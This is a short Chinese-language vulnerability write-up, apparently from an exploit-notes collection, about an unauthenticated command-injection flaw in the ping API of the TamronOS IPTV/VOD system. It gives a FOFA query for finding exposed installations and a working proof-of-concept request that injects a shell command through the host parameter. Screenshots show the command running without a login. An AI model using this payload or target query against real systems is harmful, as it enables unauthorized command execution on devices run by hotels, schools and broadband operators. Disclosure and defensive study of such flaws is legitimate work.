TamronOS IPTV系统存在前台命令执行漏洞.md
1.07 KB / 2021-07-15 20:04:58
## TamronOS IPTV系统存在前台命令执行漏洞
## 漏洞描述
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。由于未对ping接口进行限制,造成了命令执行漏洞。并且可以前台命令执行
## 漏洞影响
> TamronOS IPTV 所有版本
## FOFA
> title="TamronOS IPTV系统"
## 复现
1)登录界面
![1](/resource/TamronOS-IPTV系统任意用户添加修改/1.jpg)
2)POC如下:
```
/api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp
```
![2](/resource/TamronOS-IPTV系统前台命令执行/2.png)
![3](/resource/TamronOS-IPTV系统前台命令执行/3.png)
3) EXP如下:
![4](/resource/TamronOS-IPTV系统前台命令执行/4.png)
然后利用POC去前台(未登录状态)尝试进行命令执行:
![5](/resource/TamronOS-IPTV系统前台命令执行/5.png)
上图为没有cookie的未登录状态进行命令执行。